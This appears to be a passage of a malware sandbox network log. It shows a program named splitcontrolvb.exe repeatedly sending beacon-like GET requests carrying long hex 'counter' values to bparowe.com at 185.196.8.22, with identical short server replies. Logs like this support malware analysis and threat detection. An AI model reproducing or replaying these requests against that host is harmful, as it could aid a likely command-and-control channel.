                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                193192.168.2.456158185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:39.923444033 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:40.201775074 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                194192.168.2.456159185.196.8.2280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:40.715704918 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:40.990943909 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                195192.168.2.456160185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:41.485522985 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:41.763633013 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                196192.168.2.456161185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:42.315256119 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:42.593666077 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                197192.168.2.456162185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:43.072402000 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:43.348407984 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                198192.168.2.456163185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:43.771137953 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:44.047715902 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                199192.168.2.456164185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:44.638401985 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:44.917172909 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                200192.168.2.456165185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:45.611758947 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:45.891184092 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:45 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                201192.168.2.456166185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:46.377681017 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:46.657532930 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:46 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                202192.168.2.456167185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:47.110977888 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:47.389437914 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:47 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                203192.168.2.456168185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:47.843291998 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:48.116985083 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:47 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                204192.168.2.456169185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:48.583380938 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:48.865019083 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:48 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                205192.168.2.456170185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:49.331140041 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:49.611720085 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:49 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                206192.168.2.456171185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:50.096946955 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:50.376279116 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:50 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                207192.168.2.456172185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:50.927326918 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:51.204438925 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:51 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                208192.168.2.456173185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:51.735069990 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:52.008582115 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:51 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                209192.168.2.456174185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:52.469827890 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:52.763672113 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:52 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                210192.168.2.456175185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:53.241091013 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:53.519978046 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:53 GMT
